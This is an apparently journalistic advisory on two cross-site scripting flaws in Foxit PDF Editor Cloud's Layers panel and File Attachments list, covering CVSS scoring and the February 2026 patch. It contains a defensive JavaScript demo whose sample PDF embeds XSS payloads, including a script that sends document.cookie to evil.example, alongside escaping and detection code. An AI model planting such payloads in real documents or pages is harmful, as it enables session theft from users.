Foxit has released security updates addressing two cross-site scripting (XSS) vulnerabilities in Foxit PDF Editor Cloud that could allow attackers to execute arbitrary JavaScript in users' browsers.
The vulnerabilities were discovered in the application’s File Attachments list and Layers panel, where insufficient input validation and improper output encoding create pathways for malicious code execution.
Two related cross-site scripting vulnerabilities have been identified and assigned CVE-2026-1591 and CVE-2026-1592.
Both vulnerabilities stem from the same root cause: inadequate sanitization of user-supplied layer names and attachment file names.
The injected script runs when a user views or interacts with the crafted entries through the File Attachments list or Layers panel.
| CVE ID | Vulnerability Type | CVSS Score | Severity | Impact |
|---|---|---|---|---|
| CVE-2026-1591 | Cross-site Scripting (CWE-79) | 6.3 | Moderate | Arbitrary JavaScript Execution |
| CVE-2026-1592 | Cross-site Scripting (CWE-79) | 6.3 | Moderate | Arbitrary JavaScript Execution |
The application fails to properly encode untrusted input before embedding it into the HTML structure, enabling arbitrary JavaScript execution within the user’s browser context.
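To make the encoding failure concrete, here is an added JavaScript example. It is not Foxit's code: the PDF fragment, the names in it and every function below are constructed for illustration. It pulls layer (optional content group, OCG) names and attachment file names out of a minimal PDF fragment, renders them the vulnerable way (string concatenation straight into markup) and the hardened way (HTML entity encoding), and adds two checks a practitioner would want: an audit that the rendered panel contains only the template's own tags, and an upload-time filter that flags names carrying HTML metacharacters.

```javascript
// Added illustration of the output-encoding flaw; not Foxit code.
// Constructed PDF fragment: one benign and one hostile layer (OCG), one
// benign and one hostile embedded-file specification. Real files wrap these
// objects in xref tables and streams; only the dictionaries matter here.
// In PDF literal strings, "(" and ")" are escaped with a backslash.
const SAMPLE_PDF = [
  '1 0 obj << /Type /OCG /Name (Background) >> endobj',
  '2 0 obj << /Type /OCG /Name (<img src=x onerror="alert\\(document.cookie\\)">) >> endobj',
  '3 0 obj << /Type /Filespec /F (report.pdf) /UF (report.pdf) >> endobj',
  '4 0 obj << /Type /Filespec /F (notes<script>fetch\\("https://evil.example/?"+document.cookie\\)</script>.pdf) >> endobj',
].join('\n');

// Literal string "(...)" where ")" may appear only backslash-escaped.
const NAME_RE = /\/Name\s*\(((?:\\.|[^\\)])*)\)/;
const UF_RE   = /\/UF\s*\(((?:\\.|[^\\)])*)\)/;
const F_RE    = /\/F\s*\(((?:\\.|[^\\)])*)\)/;

// Toy decoder: only the \( \) \\ escapes this sample needs. A real parser
// also handles \n, \r, octal codes, balanced unescaped parens and hex <..>.
function decodeLiteral(raw) {
  return raw.replace(/\\([()\\])/g, '$1');
}

// Collect the strings a Layers panel / File Attachments list would display.
function extractNames(pdf) {
  const entries = [];
  for (const m of pdf.matchAll(/<<([\s\S]*?)>>\s*endobj/g)) {
    const dict = m[1];
    if (/\/Type\s*\/OCG\b/.test(dict)) {
      const n = dict.match(NAME_RE);
      if (n) entries.push({ kind: 'layer', name: decodeLiteral(n[1]) });
    } else if (/\/Type\s*\/Filespec\b/.test(dict)) {
      const n = dict.match(UF_RE) || dict.match(F_RE); // /UF (Unicode) wins over /F
      if (n) entries.push({ kind: 'attachment', name: decodeLiteral(n[1]) });
    }
  }
  return entries;
}

// VULNERABLE: untrusted names interpolated into markup (innerHTML-style sink).
function renderPanelUnsafe(entries) {
  return '<ul>' +
    entries.map(e => `<li data-kind="${e.kind}">${e.name}</li>`).join('') +
    '</ul>';
}

// FIX for an HTML text/attribute context: encode the five metacharacters.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

function renderPanelSafe(entries) {
  return '<ul>' +
    entries.map(e => `<li data-kind="${escapeHtml(e.kind)}">${escapeHtml(e.name)}</li>`).join('') +
    '</ul>';
}

// Post-render audit: every tag in the output must be one the template emits.
const TEMPLATE_TAGS = new Set(['ul', '/ul', 'li', '/li']);
function foreignTags(html) {
  const found = [];
  for (const m of html.matchAll(/<(\/?)([a-zA-Z][\w-]*)/g)) {
    const tag = m[1] + m[2].toLowerCase();
    if (!TEMPLATE_TAGS.has(tag)) found.push(tag);
  }
  return found;
}

// Upload-time triage: flag names carrying HTML metacharacters before any
// renderer sees them (defense in depth, not a substitute for encoding).
function suspiciousEntries(entries) {
  return entries.filter(e => /[<>"'&]/.test(e.name));
}

const entries = extractNames(SAMPLE_PDF);
console.log('unsafe render leaks tags:', foreignTags(renderPanelUnsafe(entries)));
console.log('safe render leaks tags:  ', foreignTags(renderPanelSafe(entries)));
console.log('flagged on upload:       ', suspiciousEntries(entries).map(e => e.name));
```

Run with node: the unsafe render leaks an `<img>` and a `<script>` element, the safe render leaks none, and the upload filter catches both hostile names. Entity encoding is the right fix for a text node or a quoted attribute; a name that lands in a JavaScript string or a URL needs that context's encoding instead, and on a real page the cleanest sink is `textContent` rather than `innerHTML`.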
The vulnerabilities are classified under CWE-79 (Cross-site Scripting) and carry a CVSS 3.0 score of 6.3, indicating moderate severity.
The attack vector is network-based (AV:N) with low attack complexity (AC:L), requiring low privileges (PR:L) and user interaction (UI:R).
The impact metrics are high confidentiality impact, low integrity impact and no availability impact.
An attacker exploiting these vulnerabilities could access sensitive information visible to the authenticated user, including document contents and session data.
The requirement for an authenticated user who interacts with the crafted entry limits exploitation somewhat: an attacker must first get a malicious document into the victim's workspace and have them open it or browse its layers or attachments.
The moderate severity rating nonetheless reflects a realistic threat in a widely used PDF editing application, since a single shared document is enough to reach every user who opens it.
Foxit has released security patches addressing both vulnerabilities as part of the February 3, 2026 update to Foxit PDF Editor Cloud.
The company emphasizes that no user action is required for Cloud versions, as updates are deployed automatically.
Users running desktop versions should check available updates through the application’s update mechanism.
Organizations using Foxit PDF Editor should verify that their installations are running the latest patched version.
The security response team recommends reviewing file handling practices and limiting user access to PDF editing features where appropriate within your organization’s security policies.
For security inquiries, Foxit’s Security Response Team can be reached at [email protected]. Additional security advisories and vulnerability reporting information are available on Foxit’s official security page.
